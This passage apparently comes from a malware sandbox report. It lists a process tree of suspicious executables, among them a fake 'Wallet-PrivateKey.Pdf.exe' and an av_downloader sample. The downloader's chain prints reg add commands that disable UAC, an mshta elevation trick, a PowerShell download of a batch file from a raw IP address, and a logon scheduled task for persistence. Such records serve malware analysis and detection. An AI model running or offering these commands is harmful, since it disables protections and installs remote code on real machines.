      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff63093cb8,0x7fff63093cc8,0x7fff63093cd8
      4⤵
      PID:6284
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1868 /prefetch:2
      4⤵
      PID:5500
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3
      4⤵
      PID:6796
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2612 /prefetch:8
      4⤵
      PID:7036
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
      4⤵
      PID:6904
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
      4⤵
      PID:1100
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
      4⤵
      PID:5532
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4700 /prefetch:8
      4⤵
      PID:7256
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4560 /prefetch:8
      4⤵
      Modifies registry class
      PID:7268
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3796 /prefetch:8
      4⤵
      PID:7116
  - - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5572 /prefetch:8
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:1096
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:1
      4⤵
      PID:8144
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
      4⤵
      PID:6944
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
      4⤵
      PID:6820
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4944 /prefetch:2
      4⤵
      PID:6568
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1
      4⤵
      PID:7992
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1
      4⤵
      PID:5568
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
      4⤵
      PID:6508
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
      4⤵
      PID:3836
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6560 /prefetch:1
      4⤵
      PID:7744
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6548 /prefetch:1
      4⤵
      PID:2180
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
      4⤵
      PID:5400
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6700 /prefetch:1
      4⤵
      PID:7364
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6636 /prefetch:1
      4⤵
      PID:7736
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
      4⤵
      PID:6196
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6904 /prefetch:1
      4⤵
      PID:5432
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6832 /prefetch:1
      4⤵
      PID:7160
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4500 /prefetch:1
      4⤵
      PID:3576
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1
      4⤵
      PID:7548
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,7382429142457969735,17623798567154459091,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6636 /prefetch:1
      4⤵
      PID:2984
- C:\Users\Admin\Desktop\Files\CleanerV2.exe
  "C:\Users\Admin\Desktop\Files\CleanerV2.exe"
  2⤵
  PID:7892
- C:\Users\Admin\Desktop\Files\Wallet-PrivateKey.Pdf.exe
  "C:\Users\Admin\Desktop\Files\Wallet-PrivateKey.Pdf.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1000
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6612
  - - C:\Users\Admin\AppData\Local\Temp\SecurityHealthHost.exe
      "C:\Users\Admin\AppData\Local\Temp\SecurityHealthHost.exe"
      4⤵
      PID:7992
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\4fcffa91-3de0-4eaa-8771-771ef2130ade.bat"
        5⤵
        
        PID:8176
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:7496
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 7992
        6⤵
        Kills process with taskkill
        
        PID:6832
      - C:\Windows\system32\timeout.exe
        
        timeout /T 2 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:4436
- C:\Users\Admin\Desktop\Files\SGVP%20Client%20Users.exe
  "C:\Users\Admin\Desktop\Files\SGVP%20Client%20Users.exe"
  2⤵
  PID:6460
- C:\Users\Admin\Desktop\Files\aaa%20(3).exe
  "C:\Users\Admin\Desktop\Files\aaa%20(3).exe"
  2⤵
  PID:6724
- C:\Users\Admin\Desktop\Files\connector1.exe
  "C:\Users\Admin\Desktop\Files\connector1.exe"
  2⤵
  PID:5840
- C:\Users\Admin\Desktop\Files\av_downloader1.1.exe
  "C:\Users\Admin\Desktop\Files\av_downloader1.1.exe"
  2⤵
  PID:8036
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\78E4.tmp\78E5.tmp\78E6.bat C:\Users\Admin\Desktop\Files\av_downloader1.1.exe"
    3⤵
    PID:6152
  - - C:\Windows\system32\mshta.exe
      mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
      4⤵
      Access Token Manipulation: Create Process with Token
      PID:7472
    - - C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE
        
        "C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE" goto :target
        5⤵
        
        PID:7028
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7E23.tmp\7E24.tmp\7E25.bat C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE goto :target"
        6⤵
        
        PID:6396
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        7⤵
        
        PID:8148
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        7⤵
        
        PID:7412
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        7⤵
        
        PID:7628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
        7⤵
        
        PID:7820
        
        C:\Windows\system32\reg.exe
        
        reg query HKEY_CLASSES_ROOT\http\shell\open\command
        8⤵
        
        PID:1144
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
        7⤵
        
        PID:8092
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff63093cb8,0x7fff63093cc8,0x7fff63093cd8
        8⤵
        
        PID:5116
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h d:\net
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7044
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3884
- C:\Users\Admin\Desktop\Files\cleanup_tool.exe
  "C:\Users\Admin\Desktop\Files\cleanup_tool.exe"
  2⤵
  PID:3728
- C:\Users\Admin\Desktop\Files\ewm.exe
  "C:\Users\Admin\Desktop\Files\ewm.exe"
  2⤵
  PID:2404
- C:\Users\Admin\Desktop\Files\Uploader.exe
  "C:\Users\Admin\Desktop\Files\Uploader.exe"
  2⤵
  PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5692 -ip 5692
1⤵
PID:2776

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0x84,0x108,0x7fff6340cc40,0x7fff6340cc4c,0x7fff6340cc58
  2⤵
  PID:232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2000,i,6076342537324717464,11936647781001734712,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=1924 /prefetch:2
  2⤵
  PID:1964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1748,i,6076342537324717464,11936647781001734712,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=2040 /prefetch:3
  2⤵
  PID:1300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2168,i,6076342537324717464,11936647781001734712,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=2356 /prefetch:8
  2⤵
  PID:3808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,6076342537324717464,11936647781001734712,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=3220 /prefetch:1
  2⤵
  PID:6108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,6076342537324717464,11936647781001734712,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=3244 /prefetch:1
  2⤵
  PID:6120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4428,i,6076342537324717464,11936647781001734712,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=4436 /prefetch:1
  2⤵
  PID:5240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4728,i,6076342537324717464,11936647781001734712,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=4804 /prefetch:8
  2⤵
  PID:3132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4996,i,6076342537324717464,11936647781001734712,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=5000 /prefetch:8
  2⤵
  PID:1684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4824,i,6076342537324717464,11936647781001734712,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=5136 /prefetch:1
  2⤵
  PID:6024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4400,i,6076342537324717464,11936647781001734712,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=5332 /prefetch:1
  2⤵
  PID:5804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5460,i,6076342537324717464,11936647781001734712,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=5388 /prefetch:1
  2⤵
  PID:4852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5028,i,6076342537324717464,11936647781001734712,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=5100 /prefetch:8
  2⤵
  PID:3012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4852,i,6076342537324717464,11936647781001734712,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=5564 /prefetch:8
  2⤵
  - Modifies registry class
  PID:2880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5600,i,6076342537324717464,11936647781001734712,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=5624 /prefetch:8
  2⤵
  PID:5440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4804,i,6076342537324717464,11936647781001734712,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=5404 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:6032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5720,i,6076342537324717464,11936647781001734712,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=5716 /prefetch:8
  2⤵
  PID:2148

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:128

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4464
- C:\Users\Admin\Desktop\Files\BootstrapperNew.exe
  "C:\Users\Admin\Desktop\Files\BootstrapperNew.exe"
  2⤵
  - Executes dropped EXE
  PID:1556
- C:\Users\Admin\Desktop\Files\Client-built.exe
  "C:\Users\Admin\Desktop\Files\Client-built.exe"
  2⤵
  - Executes dropped EXE
  PID:1528
